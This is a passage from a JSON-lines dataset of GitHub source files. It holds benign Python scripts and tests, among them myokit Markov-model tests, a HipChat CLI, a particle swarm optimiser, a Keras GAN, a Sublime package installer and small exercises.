ina.b12 + ina.b3)')\n self.assertEqual(f[1].code(), 'ina.a12')\n self.assertIsNone(f[2])\n self.assertEqual(f[3].code(), 'ina.a3')\n self.assertIsNone(f[4])\n self.assertEqual(f[5].code(), 'ina.b13')\n\n # Test double appearances\n v1.set_rhs('2 * C1 - 3 * C1 + C1 * sqrt(O) + C2 * IF')\n f = markov._linear_combination(v1.rhs(), [v1, v2, v3])\n self.assertEqual(f[0].code(), '2 + -3 + sqrt(ina.O)')\n self.assertEqual(f[1].code(), 'ina.IF')\n self.assertIsNone(f[2])\n\n def test_split_factor(self):\n # Tests _split_factor\n\n # Load model, to create interesting RHS\n fname = os.path.join(DIR_DATA, 'clancy-1999-fitting.mmt')\n model = myokit.load_model(fname)\n v1 = model.get('ina.C1')\n v2 = model.get('ina.C2')\n v3 = model.get('ina.C3')\n v4 = model.get('ina.IF')\n\n # Test simplest cases\n v4.set_rhs('C1')\n self.assertEqual(\n markov._split_factor(v4.rhs(), [v1]),\n (myokit.Name(v1), myokit.Number(1)))\n v4.set_rhs('+++C1')\n self.assertEqual(\n markov._split_factor(v4.rhs(), [v1]),\n (myokit.Name(v1), myokit.Number(1)))\n v4.set_rhs('--C1')\n self.assertEqual(\n markov._split_factor(v4.rhs(), [v1]),\n (myokit.Name(v1), myokit.Number(1)))\n v4.set_rhs('---C1')\n self.assertEqual(\n markov._split_factor(v4.rhs(), [v1]),\n (myokit.Name(v1), myokit.PrefixMinus(myokit.Number(1))))\n\n # Test multiplication\n v4.set_rhs('C1 * 3')\n self.assertEqual(\n markov._split_factor(v4.rhs(), [v1]),\n (myokit.Name(v1), myokit.Number(3)))\n v4.set_rhs('C1 * (sqrt(C2) + C3)')\n self.assertEqual(\n markov._split_factor(v4.rhs(), [v1]),\n (myokit.Name(v1),\n myokit.Plus(myokit.Sqrt(myokit.Name(v2)), myokit.Name(v3))))\n\n # Test division\n v4.set_rhs('C1 / (sqrt(C2) + C3)')\n self.assertEqual(\n markov._split_factor(v4.rhs(), [v1]),\n (myokit.Name(v1),\n myokit.Divide(\n myokit.Number(1),\n myokit.Plus(myokit.Sqrt(myokit.Name(v2)), myokit.Name(v3)))))\n\n # Test division that's not allowed\n v4.set_rhs('(sqrt(C2) + C3) / C1')\n self.assertRaisesRegex(\n ValueError, r'Non-linear function \\(division\\)',\n markov._split_factor, v4.rhs(), [v1])\n\n # Test with list of variables\n v4.set_rhs('C2 * 3')\n self.assertEqual(\n markov._split_factor(v4.rhs(), [v1, v2, v3]),\n (myokit.Name(v2), myokit.Number(3)))\n\n # Multiple variables is not allowed\n v4.set_rhs('C2 * C1')\n self.assertRaisesRegex(\n ValueError, 'must reference exactly one variable',\n markov._split_factor, v4.rhs(), [v1, v2, v3])\n\n # Zero variables is not allowed\n v4.set_rhs('C3')\n self.assertRaisesRegex(\n ValueError, 'must reference exactly one variable',\n markov._split_factor, v4.rhs(), [v1, v2])\n\n # Non-linear term is not allowed\n v4.set_rhs('sqrt(C1)')\n self.assertRaisesRegex(\n ValueError, 'Non-linear function',\n markov._split_factor, v4.rhs(), [v1, v2])\n\n # Multiple terms is not allowed\n v4.set_rhs('C2 - C2')\n self.assertRaisesRegex(\n ValueError, 'must be a single term',\n markov._split_factor, v4.rhs(), [v1, v2, v3])\n\n def test_split_terms(self):\n # Tests _split_terms\n\n # Load model, get rhs with lots of terms\n fname = os.path.join(DIR_DATA, 'clancy-1999-fitting.mmt')\n model = myokit.load_model(fname)\n\n # Simple case\n v1 = model.get('ina.C1')\n v2 = model.get('ina.C2')\n v3 = model.get('ina.C3')\n v4 = model.get('ina.IF')\n v5 = model.get('ina.IS')\n v6 = model.get('ina.O')\n v3.set_rhs('1 - C1 - C2 - IF - IS - O')\n terms = markov._split_terms(v3.rhs())\n self.assertEqual(terms[0], myokit.Number(1))\n self.assertEqual(terms[1], myokit.PrefixMinus(myokit.Name(v1)))\n self.assertEqual(terms[2], myokit.PrefixMinus(myokit.Name(v2)))\n self.assertEqual(terms[3], myokit.PrefixMinus(myokit.Name(v4)))\n self.assertEqual(terms[4], myokit.PrefixMinus(myokit.Name(v5)))\n self.assertEqual(terms[5], myokit.PrefixMinus(myokit.Name(v6)))\n del terms\n\n # Case with brackets\n v3.set_rhs('-(+(IF) + C1 -(-IS - C2)) + 1 - O')\n terms = markov._split_terms(v3.rhs())\n self.assertEqual(terms[0], myokit.PrefixMinus(myokit.Name(v4)))\n self.assertEqual(terms[1], myokit.PrefixMinus(myokit.Name(v1)))\n self.assertEqual(terms[2], myokit.PrefixMinus(myokit.Name(v5)))\n self.assertEqual(terms[3], myokit.PrefixMinus(myokit.Name(v2)))\n self.assertEqual(terms[4], myokit.Number(1))\n self.assertEqual(terms[5], myokit.PrefixMinus(myokit.Name(v6)))\n\n # Empty case\n v3.set_rhs('1 * C1 * C2')\n terms = markov._split_terms(v3.rhs())\n self.assertEqual(len(terms), 1)\n self.assertEqual(terms[0], v3.rhs())\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"myokit/myokit","sub_path":"myokit/tests/test_lib_markov.py","file_name":"test_lib_markov.py","file_ext":"py","file_size_in_byte":39821,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"90"} +{"seq_id":"38087914184","text":"import json\n\nfrom django.http import HttpResponse\nfrom plenario_ifttt.utils import JsonUtf8Response\n\n\n# https://platform.ifttt.com/docs#2-create-your-service-and-connect-to-ifttt\ndef status(request):\n return HttpResponse()\n\n\n# https://platform.ifttt.com/docs#2-create-your-service-and-connect-to-ifttt\ndef setup(request):\n data = {\n \"data\": {\n \"samples\": {\n \"triggers\": {\n \"alert\": {\n \"node\": \"0000001e0610b9fd\",\n \"feature\": \"temperature.internal_temperature\",\n \"operator\": \"gt\",\n \"value\": \"0\"\n },\n \"nearest\": {\n \"location\": {\n \"lat\": \"42\",\n \"lng\": \"-81\",\n \"address\": \"Somewhere in Chicago\",\n \"description\": \"Foobar\"\n },\n \"feature\": \"temperature.internal_temperature\",\n \"operator\": \"gt\",\n \"value\": \"0\"\n }\n }\n }\n }\n }\n\n return JsonUtf8Response(data)\n","repo_name":"UrbanCCD-UChicago/plenario-ifttt","sub_path":"plenario_ifttt/ifttt.py","file_name":"ifttt.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"5626844908","text":"#! /usr/bin/env python3\n\n\"\"\"\nCommand-line script to submit a HipChat message to one or more channels.\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import unicode_literals\n\nfrom os import path\nimport sys\nimport click\n\n# Add top-level module path to sys.path before importing tubular code.\nsys.path.append(path.dirname(path.dirname(path.abspath(__file__))))\n\nfrom tubular.hipchat import submit_hipchat_message # pylint: disable=wrong-import-position\n\n\n@click.command()\n@click.option(\n '--auth_token',\n required=True,\n help=\"Authentication token to use for HipChat REST API.\",\n)\n@click.option(\n '--channel',\n multiple=True,\n required=True,\n help=\"Channel to which the script should post a message. Case Sensitive.\"\n)\n@click.option(\n '--message',\n required=True,\n help=\"Message to send to HipChat channel.\",\n)\n@click.option(\n '--color',\n default=\"green\",\n help='The color of the message in HipChat.',\n)\ndef submit_hipchat_msg(auth_token, channel, message, color):\n \"\"\"\n Post a message to one or more HipChat channels.\n \"\"\"\n submit_hipchat_message(auth_token, channel, message, color)\n\n # An exit code of 0 means success and non-zero means failure.\n sys.exit(0)\n\n\nif __name__ == '__main__':\n submit_hipchat_msg() # pylint: disable=no-value-for-parameter\n","repo_name":"macdiesel/tubular","sub_path":"tubular/scripts/submit_hipchat_msg.py","file_name":"submit_hipchat_msg.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"90"} +{"seq_id":"6228388015","text":"import math\n\nimport numpy as np\n\nfrom mlpy.numberGenerator.bounds import Bounds\nfrom mlpy.particleSwarmOptimization.pso import PSO\nfrom mlpy.particleSwarmOptimization.structure.particle import Particle\n\nnp.set_printoptions(suppress=True)\n\nerrors = []\nbounds = Bounds(-10, 10)\n\n# Create the mlpy with the nn weights\nnum_particles = 7\ninertia_weight = 0.729\ncognitiveConstant = 1.49\nsocialConstant = 1.49\nnum_dimensions = 50\n# Configure PSO\npso = PSO()\n\ndef error(position):\n err = 0.0\n for i in range(len(position)):\n xi = position[i]\n err += (xi * xi) - (10 * math.cos(2 * math.pi * xi)) + 10\n return err\n\n# Create particles\nfor i in range(pso.num_particles):\n row = []\n for j in range(pso.num_particles):\n particle = Particle(bounds, inertia_weight, cognitiveConstant, socialConstant)\n particle.initPos(4 * np.random.random(num_dimensions) - 2)\n row.append(particle)\n\n pso.swarm.append(row)\n\nfor i in range(pso.num_particles):\n for j in range(pso.num_particles):\n if i > 0: # We can go west\n pso.swarm[i][j].neighbourhood.append(pso.swarm[i - 1][j])\n if i < pso.num_particles - 1: # We can go east\n pso.swarm[i][j].neighbourhood.append(pso.swarm[i + 1][j])\n if j > 0: # We can go north\n pso.swarm[i][j].neighbourhood.append(pso.swarm[i][j - 1])\n if j < pso.num_particles - 1: # We can go south\n pso.swarm[i][j].neighbourhood.append(pso.swarm[i][j + 1])\n\n\n# Iterate over training data\nfor x in range(2000):\n # Loop over particles\n for i, row in enumerate(pso.swarm):\n for j, col in enumerate(row):\n\n # Fire the neural network and calculate error\n pso.swarm[i][j].error = error(pso.swarm[i][j].position)\n\n # Get & set personal best\n pso.swarm[i][j].getPersonalBest()\n\n # Print results\n print(i, j, np.array(pso.swarm[i][j].error))\n\n for i in range(pso.num_particles):\n for j in range(pso.num_particles):\n particle = pso.swarm[i][j]\n neighbourhoodBest = particle.error\n neighbourhoodBestPos = particle.position\n\n for neighbour in particle.neighbourhood:\n if abs(neighbour.error) < abs(neighbourhoodBest):\n neighbourhoodBestPos = np.array(neighbour.position)\n neighbourhoodBest = neighbour.error\n # Get current global best as well\n if abs(neighbour.error) < abs(pso.best_error):\n pso.best_position = np.array(particle.position)\n pso.best_error = particle.error\n\n pso.swarm[i][j].update_velocity(neighbourhoodBestPos)\n pso.swarm[i][j].update_position()\n\n if(x % 1 == 0):\n print(\"Current best error:\\t\" + str(pso.best_error) + \"\\n\")\n\nprint('FINAL:')\nprint(pso)","repo_name":"quintonweenink/chaotic-pso-nn-training","sub_path":"experiments/pso/von-neumann-pso-math.py","file_name":"von-neumann-pso-math.py","file_ext":"py","file_size_in_byte":2869,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"90"} +{"seq_id":"17669065690","text":"#!/usr/bin/env python\n\nout = [True for x in range(1023)]\n\n# convert to binary\nwith open('input.txt') as f:\n for line in f.readlines():\n line = line.strip()\n Id = int(line\n .replace('F', '0')\n .replace('B', '1')\n .replace('L', '0')\n .replace('R', '1'), 2)\n out[Id] = False\n\n# trim end\nif out[0]:\n for i, v in enumerate(out):\n if not v:\n break\n out[i] = False\n\n# trim front\nif out[-1]:\n for i in range(len(out)-1, 0, -1):\n if not out[i]:\n break\n out[i] = False\n\n# print found output\nfor i, v in enumerate(out):\n if v:\n print(i)\n","repo_name":"tomatih/AdventOfCode2020","sub_path":"Day05/gold.py","file_name":"gold.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"38347504646","text":"\ndef main():\n\n print(\"enter a number to add to listA (press q to end early)\")\n flag = ''\n count = 1\n listA = []\n listB = []\n\n while count <= 10:\n flag = input(\"enter number \" + str(count) + \" to listA: \")\n if flag == 'q':\n break\n else:\n listA.append(int(flag))\n count += 1\n\n flag = ''\n count = 1\n\n print(\"enter a number to add to listB (press q to end early)\")\n while count <= 10:\n flag = input(\"enter number \" + str(count) + \" to listB: \")\n if flag == 'q':\n break\n else:\n listB.append(int(flag))\n count += 1\n\n compute(listA, listB)\n \n\ndef compute(a,b):\n\n out = []\n\n for itemA in a:\n for itemB in b:\n out.append([itemA,itemB])\n\n print(out)\n\nif __name__ == '__main__':\n main()","repo_name":"KeefeT/CSUGlobal","sub_path":"ITS320_Basic_Programming/tjs_code/ITS320_CTA6_Option2.py","file_name":"ITS320_CTA6_Option2.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"5340155551","text":"from time import sleep\nfrom django.core.mail import send_mail\nfrom tryapp.models import CustomUser\nfrom .models import AccessKey\nfrom celery import shared_task\n\n@shared_task()\ndef access_key_revoke_email(user_id, access_key_id):\n # sleep(5) \n user = CustomUser.objects.get(id=user_id)\n access_key = AccessKey.objects.get(id=access_key_id)\n print(user)\n message = f'hello, {user.first_name} from {user.school_name} your access key, {access_key.key} with expiry date, {access_key.expiry_date} has been revoked' \n send_mail(\n 'Revoked Access Key',\n message,\n 'douglasdanso66@gmail.com',\n [user.email],\n fail_silently=False,\n )\n","repo_name":"douglas-danso/Access_key_manager_API","sub_path":"accesskeyapp/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"73225964777","text":"import numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot as plt\n\nimport keras\nfrom keras.models import Sequential, Model\nfrom keras.layers import Input, Dense, Conv2D, BatchNormalization, Dropout, Flatten\nfrom keras.layers import Activation, Reshape, Conv2DTranspose, UpSampling2D # new!\nfrom keras.optimizers import RMSprop\n\nfrom discriminator import discriminator_builder\nfrom generator import generator_builder\nfrom data_manager import get_data\n\n\ndef adversarial_builder(discriminator, generator, z_dim=100):\n model = Sequential()\n model.add(generator)\n model.add(discriminator)\n model.compile(loss='binary_crossentropy',\n optimizer=RMSprop(lr=0.0004, decay=3e-8, clipvalue=1.0),\n metrics=['accuracy'])\n # model.summary()\n return model\n\n\ndef make_trainable(net, val):\n net.trainable = val\n for l in net.layers:\n l.trainable = val\n\n\ndef train(epochs=2000, batch=128):\n d_metrics = []\n a_metrics = []\n\n running_d_loss = 0\n running_d_acc = 0\n running_a_loss = 0\n running_a_acc = 0\n\n for i in range(epochs):\n\n if i % 10 == 0:\n print(i)\n\n real_imgs = np.reshape(data[np.random.choice(data.shape[0], batch, replace=False)], (batch, 28, 28, 1))\n fake_imgs = generator.predict(np.random.uniform(-1.0, 1.0, size=[batch, 100]))\n\n x = np.concatenate((real_imgs, fake_imgs))\n y = np.ones([2 * batch, 1])\n y[batch:, :] = 0\n\n make_trainable(discriminator, True)\n\n d_metrics.append(discriminator.train_on_batch(x, y))\n running_d_loss += d_metrics[-1][0]\n running_d_acc += d_metrics[-1][1]\n\n make_trainable(discriminator, False)\n\n noise = np.random.uniform(-1.0, 1.0, size=[batch, 100])\n y = np.ones([batch, 1])\n\n a_metrics.append(adversarial_model.train_on_batch(noise, y))\n running_a_loss += a_metrics[-1][0]\n running_a_acc += a_metrics[-1][1]\n\n if (i + 1) % 500 == 0:\n\n print('Epoch #{}'.format(i + 1))\n log_mesg = \"%d: [D loss: %f, acc: %f]\" % (i, running_d_loss / i, running_d_acc / i)\n log_mesg = \"%s [A loss: %f, acc: %f]\" % (log_mesg, running_a_loss / i, running_a_acc / i)\n print(log_mesg)\n\n noise = np.random.uniform(-1.0, 1.0, size=[16, 100])\n gen_imgs = generator.predict(noise)\n # np.save('gen_img' + str(i+1) + '.npy', gen_imgs)\n\n plt.figure(figsize=(5, 5))\n\n for k in range(gen_imgs.shape[0]):\n plt.subplot(4, 4, k + 1)\n plt.imshow(gen_imgs[k, :, :, 0], cmap='gray')\n plt.axis('off')\n\n plt.tight_layout()\n plt.show()\n # plt.savefig('apple' + str(i+1) + '.png')\n\n return a_metrics, d_metrics\n\n\nif __name__ == '__main__':\n data = get_data()\n discriminator = discriminator_builder()\n discriminator.compile(loss='binary_crossentropy',\n optimizer=RMSprop(lr=0.0008, decay=6e-8, clipvalue=1.0),\n metrics=['accuracy'])\n generator = generator_builder()\n adversarial_model = adversarial_builder(discriminator, generator)\n a_metrics_complete, d_metrics_complete = train(epochs=3000)\n","repo_name":"ilyarudyak/cs230-deep-learning","sub_path":"dltf-krohn/gans/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3253,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"90"} +{"seq_id":"34761944312","text":"#!/bin/env python3\n\nimport imageio\nfrom sklearn.utils import shuffle\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\nimport scipy.io\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport logging\n# == set logging ==\n#logging.basicConfig(level=logging.DEBUG)\nlogging.basicConfig(level=logging.DEBUG, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n#formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nlogger = logging.getLogger(__name__)\n# load our dataset\nlogger.info('load data')\ntrain_data = scipy.io.loadmat('projects/image_class/extra_32x32.mat')\n# extract the images and labels from the dictionary object\nX = train_data['X']\ny = train_data['y']\nimg_index = 25 # view an image (e.g. 25) and print its corresponding label\n# plt.imshow(X[:,:,:,img_index])\n# plt.show()\nlogger.info('label for image index: {}'.format(y[img_index]))\n\n#vectorizer\nlogger.info('vectorize')\nX = X.reshape(X.shape[0]*X.shape[1]*X.shape[2],X.shape[3]).T\ny = y.reshape(y.shape[0],)\nX, y = shuffle(X, y, random_state=42)\n\n# setup classifier\nclf = RandomForestClassifier()\nlogger.info('classifier: {0}'.format(clf))\n\n# train/test split & fit\nlogger.info('split')\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\nlogger.info('fit')\nclf.fit(X_train, y_train)\n\n# setup predictions\nlogger.info('setup predictions')\nprediction = clf.predict(X_test)\nlogger.info(\"Accuracy: {0:.3f}\".format(accuracy_score(y_test, prediction)))\n","repo_name":"diverdano/ml-projects","sub_path":"ml_image_rf.py","file_name":"ml_image_rf.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"2090075947","text":"'''def profanity_checker(words):\n output = []\n#\tfor keys in words:\n#\t\tkey_word = keys.split()\n#\t\tprint(key_word)\n for word in words:\n out = search_word_in_file(word) \n if(out != 'None'):\n output.append(out)\n return output\n\n\ndef search_word_in_file( word ):\n f = open(\"profanity.txt\",\"r\")\n profanity_file = f.read()\n if word in profanity_file:\n print\n'''\nfrom profanity_check import predict, predict_prob\nf = open(\"profanity.txt\",\"r\")\ninputs = f.read().split('\\n')\no1 = open(\"output1.txt\",\"w\")\no2 = open(\"output2.txt\",\"w\")\nfor word in inputs:\n if(predict([word])==0):\n st = word+\" \"+str(predict_prob([word]))+\"\\n\"\n o1.write(st)\n else:\n st = word+\" \"+str(predict_prob([word]))+\"\\n\"\n o2.write(st)\n","repo_name":"varalakshmi-kondamuri/Keyword","sub_path":"profanity_checker.py","file_name":"profanity_checker.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"20002645995","text":"import setuptools\nimport codecs\n\nwith codecs.open('README.md', encoding='utf-8') as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"shtRipper_cpp\",\n version=\"1.3.3\",\n author=\"Rezenter\",\n author_email=\"nisovru@gmail.com\",\n description=\"C++ parser of .sht files.\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/Rezenter/shtRipper_cpp/tree/master/python\",\n packages=['shtRipper'],\n classifiers=[\n \"Programming Language :: Python :: 3.5\",\n \"License :: OSI Approved :: MIT License\",\n 'Operating System :: Microsoft :: Windows :: Windows 10',\n ],\n python_requires='>=3.5',\n install_requires=[],\n entry_points={\n 'console_scripts': [\n 'cursive = cursive.tools.cmd:cursive_command',\n ],\n },\n include_package_data=True\n)\n","repo_name":"Rezenter/shtRipper_cpp","sub_path":"python/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"} +{"seq_id":"26407772711","text":"env = Environment(CXXFLAGS = \"-O2 -Wall -Wextra -Werror -std=c++0x -pedantic\",\n CFLAGS = \"-O2 -Wall -Wextra -Werror -std=c99 -pedantic\")\n\ndestdir = ARGUMENTS.get(\"destdir\", \"\")\n\ncrowrt = env.Library(\"fsroot/lib/crowrt\", Glob(\"src/crowrt/*.c\"))\ncrowrt_headers = env.Install(\"fsroot/include/crow\", Glob(\"src/crowrt/*.h\"))\ncrowc = env.Program(\"fsroot/bin/crowc\", Glob(\"src/crowc/*.cc\"))\ncrowl = env.Install(\"fsroot/bin\", \"src/crowl/crowl\")\n\nbin = env.Install(destdir + \"/usr/bin\", Glob(\"fsroot/bin/*\"))\nlib = env.Install(destdir + \"/usr/lib\", Glob(\"fsroot/lib/*\"))\ninclude_crow = env.Install(destdir + \"/usr/include/crow\", Glob(\"fsroot/include/crow/*\"))\nenv.Alias(\"install\", [bin, lib, include_crow])\n\nDefault(crowrt, crowrt_headers, crowc, crowl)\n\n","repo_name":"mkm/crowlang-1","sub_path":"SConstruct","file_name":"SConstruct","file_ext":"","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"} +{"seq_id":"15118047223","text":"checklist = list()\n# checklist.append(\"Hello\")\n# print(checklist)\n\ndef create(item):\n checklist.append(item)\n\ndef read(item):\n # if checklist[item] not in checklist:\n # print(\"nodvsvuhsvcuscushfadisucashi\")\n # return False\n # if int(item) not in checklist:\n # print(\"invalid index. Please choose a number between 0 and \" + len(checklist)-1)\n print(checklist[int(item)])\n\n# checklist = ['Hello', 'World']\n# checklist[0] = \"Cats\"\n\ndef update(index, item):\n checklist[index] = item\n\n# checklist = ['Hello', 'World']\n# checklist.pop(1)\n\ndef destroy(index):\n checklist.pop(index)\n\ndef list_all_items():\n index = 0\n for list_item in checklist:\n print(list_item)\n\ndef select(function_code):\n #Create item in checklist here\n if function_code == \"C\" or function_code == \"c\":\n item = input(\"What do you want to create? \")\n create(item)\n # Read item in checklist here\n elif function_code == \"R\" or function_code == \"r\":\n item = int(input(\"What index do you want to read? \"))\n read(item)\n # Print all items here\n elif function_code == \"P\" or function_code == \"p\":\n list_all_items()\n # This is where we want to stop our loop\n elif function_code == \"Q\" or function_code == \"q\":\n return False\n else:\n #Catch all\n print(\"Unknown Option\")\n return True\n\nrunning = True\n\nwhile running:\n selection = input(\"Press C to add to list, R to Read from list and P to display list: \")\n running = select(selection)\n\ndef test():\n create(\"purple sox\")\n create(\"red cloak\")\n\n print(read(0))\n print(read(1))\n\n update(0, \"purple socks\")\n \n destroy(1)\n print(read(0))\n\n list_all_items()\n\n # Call your new function with the appropriate value\n # select(\"C\")\n # # View the results\n # list_all_items()\n # # Call function with new value\n # select(\"R\")\n # # View results\n # list_all_items()\n # Continue until all code is run\n # user_input(\"What is user input\")","repo_name":"Asim-Product-College/CS-1.1-Programming-Fundamentals","sub_path":"checklist/checklist.py","file_name":"checklist.py","file_ext":"py","file_size_in_byte":2040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"9620978427","text":"from zipfile import ZipFile\nimport traceback\nimport tempfile\nimport shutil\nimport os\nimport sublime\n\nfrom .. import logger\nlog = logger.get(__name__)\nfrom .. import settings\nfrom . import util\n\n\ndef _zipdir(path, zip):\n for root, dirs, files in os.walk(path):\n for file in files:\n loc = os.path.join(root, file)\n # Make sure plugin files are at root\n arcname = os.path.relpath(loc, start=path)\n zip.write(loc, arcname=arcname)\n\n\ndef _make_zip_file(data):\n try:\n zh, zip_file = tempfile.mkstemp()\n with open(zip_file, 'wb') as f:\n f.write(data)\n result = zip_file\n except:\n log.error('Zip creation failed.')\n traceback.print_exc()\n result = False\n finally:\n os.close(zh)\n return result\n\n\ndef install_package(package, zip_data):\n settings.ignore_package(package.name)\n result = True\n try:\n zip_file = _make_zip_file(zip_data)\n if not zip_file:\n return False\n\n prefix = ''\n\n tmp_dir = tempfile.mkdtemp()\n\n # Extract files from zip data\n with ZipFile(zip_file, 'r') as myzip:\n prefix = os.path.commonprefix(myzip.namelist())\n myzip.extractall(path=tmp_dir)\n\n # Repackage with correct name, location and folder tree\n pkg = package.name + util.PKG_SUFFIX\n install_path = os.path.join(sublime.installed_packages_path(), pkg)\n with ZipFile(install_path, 'w') as myzip:\n _zipdir(os.path.join(tmp_dir, prefix), myzip)\n\n except PermissionError:\n log.error('Permission error.')\n traceback.print_exc()\n result = False\n except:\n log.error('Unexpected exception:')\n traceback.print_exc()\n result = False\n finally:\n shutil.rmtree(tmp_dir)\n os.remove(zip_file)\n settings.unignore_package(package.name)\n return result\n","repo_name":"blopker/PCLite","sub_path":"pclite/io/install.py","file_name":"install.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"90"} +{"seq_id":"34658960355","text":"import json\n\nwith open(\"pi_digits.txt\") as file_object:\n contents = file_object.read()\nprint(contents)\n\n# file_name = \"programming.txt\"\n# with open(file_name, 'w') as file_object:\n# file_object.write(\"I love programming!\")\n\n# json\nnumbers = [2, 3, 5, 7, 11, 13]\nfile_name2 = \"numbers.json\"\nwith open(file_name2, 'w') as f:\n json.dump(numbers, f)\n\nwith open(file_name2) as f:\n numbers = json.load(f)\nprint(numbers)","repo_name":"Lyuwalle/readExcelProject","sub_path":"file_exceptions.py","file_name":"file_exceptions.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"18377178679","text":"N, K = list(map(int, input().split()))\nP = 10 ** 9 + 7\n\n\ndef combination(n, r):\n if r == 0:\n return 1\n x = 1\n y = 1\n for i in range(n - r + 1, n + 1):\n x = (x * i % P)\n for i in range(1, r + 1):\n y = (y * i % P)\n y_inv = _power(y, P - 2)\n return (x * y_inv) % P\n\n\ndef _power(x, n):\n ans = 1\n while n > 0:\n if bin(n & 1) == bin(1):\n ans = (ans * x) % P\n x = (x * x) % P\n n = n >> 1\n return ans\n\n\nfor i in range(1, K + 1):\n if i - 1 <= N - K:\n print((combination(K - 1, i - 1) * combination(N - K + 1, i)) % P)\n else:\n print(0)\n","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p02990/s810489867.py","file_name":"s810489867.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"24372526940","text":"# IMPORTS FOR EVERY PART\nfrom misc import insert_every_second_black_frame\nfrom misc import lin_interpol\n\n\n# ––––– STATIC VARIABLES –––––\n# NEEDED FOR EVERY PART\n\n# Ritardando, slow down\n\n# Root ratios\nr0 = 2/1\nr1 = 3/2\nr2 = 4/3\nr3 = 5/4\nr4 = 6/5\nratios = [r0, r1, r2, r3, r4]\n\n# Minimum durations\nx0 = 1/30\nx1 = x0 * r0\nx2 = x1 * r1\nx3 = x2 * r2\nx4 = x3 * r3\nx5 = x4 * r4\n\n# Multiplication arrays/sets\nn = 6 # Length of each array\nmul_set0 = [r0 ** i for i in range(n)]\nmul_set1 = [r1 ** i for i in range(n)]\nmul_set2 = [r2 ** i for i in range(n)]\nmul_set3 = [r3 ** i for i in range(n)]\nmul_set4 = [r4 ** i for i in range(n)]\n\n\n\n\n# ––––– SCORE –––––\n\n\n# MAIN PARAMETERS TO CONTROL:\nN_EVENTS = 10\nIMG_CHANGE_FREQ = 1\nELEM_MINSIZE = 0.2\nELEM_MAXSIZE = 0.28\nN = 7 # Number of images for each shape/color combination.\nEXPORT_FILENAME = \"002\"\nAMP = 0.25\nMAPPING_KEY = \"color\"\n\nMIN_VAL = x4\nMUL_SET = mul_set1\nMUL_SET_IDX = None # Not applicable\n\nCOLOR = \"R\"\nSHAPE = \"TRIANGLE\"\n\n\nCOLOR_TRANSFORMATION = [ # Overwriting default colors assignements with new colors (for the same symbols, \"r\", \"g\", \"b\")\n(\"r\", (205,92,92)), # indianred\n#(\"g\", (143,188,143)), # darkseagreen\n(\"g\", (138,188,134)), # custom darkseagreen\n(\"b\", (71,128,182)) # steelblue\n]\n\n\n# ----- MAKING DATA SEQUENCES -----\n\ncolor_original_seq = []\n\nfor i in range(N_EVENTS):\n color_original_seq.append(COLOR)\n\nshape_original_seq = [SHAPE for i in range(len(color_original_seq))]\n\n# -- Making sequence of color values and shapes --\ncolor_seq = insert_every_second_black_frame(color_original_seq, insert_at_start=False, insert_at_end=True) # Inserting a \"black\" for every value in color_row\nshape_seq = insert_every_second_black_frame(shape_original_seq, insert_at_start=False, insert_at_end=True) # Inserting a \"black\" for every value in color_row\n\n\n# -- Durations --\n\n# Set 1 multiplied with minimum value 3\nbase_durations = [MIN_VAL * i for i in MUL_SET]\n#duration_seq = [root_durations[MUL_SET_IDX] for i in range(len(color_seq))]\n\nduration_seq = []\nduration_idxes = [int(lin_interpol(beg=5.9999, end=3.0, steps=len(color_seq), i=i)) for i in range(len(color_seq))]\nfor idx in duration_idxes:\n duration_seq.append(base_durations[idx])\n","repo_name":"fuzzklang/flimmering","sub_path":"score_files/scripts_and_data/A/A3.py","file_name":"A3.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"18056221329","text":"import sys\n\nsys.setrecursionlimit(10 ** 7)\nf_inf = float('inf')\nmod = 10 ** 9 + 7\n\n\ndef 